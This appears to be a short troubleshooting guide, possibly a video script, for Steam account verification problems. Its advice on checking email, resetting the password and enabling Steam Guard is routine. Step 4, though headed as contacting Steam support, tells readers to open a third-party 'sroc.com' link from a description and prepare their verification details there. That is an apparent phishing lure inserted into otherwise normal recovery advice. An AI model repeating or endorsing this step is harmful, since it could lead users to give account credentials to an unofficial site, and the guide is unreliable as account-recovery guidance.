If you're facing verification issues on Steam after multiple failed attempts, follow these steps to resolve the problem effectively. Step 1. Check your email. Ensure that you have access to the email associated with your Steam account. Look for any verification emails from Steam, including those in your spam or junk folder. Step 2. Reset your password. If you suspect that your account may have been compromised, reset your password. Go to the Steam login page, click on Forgot Your Password, and follow the instructions to create a new password. Step 3. Enable two-factor authentication. To enhance your account security, enable Steam Guard, which provides two-factor authentication. Go to your account settings, find the Steam Guard section, and follow the prompts to set it up. Step 4. Contact Steam support. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Wait for resolution. After contacting support, be patient. It may take some time for Steam support to respond and resolve your verification issues. Check your email regularly for updates. By following these steps, you should be able to resolve your verification issues on Steam. Remember to keep your account information secure and regularly update your password.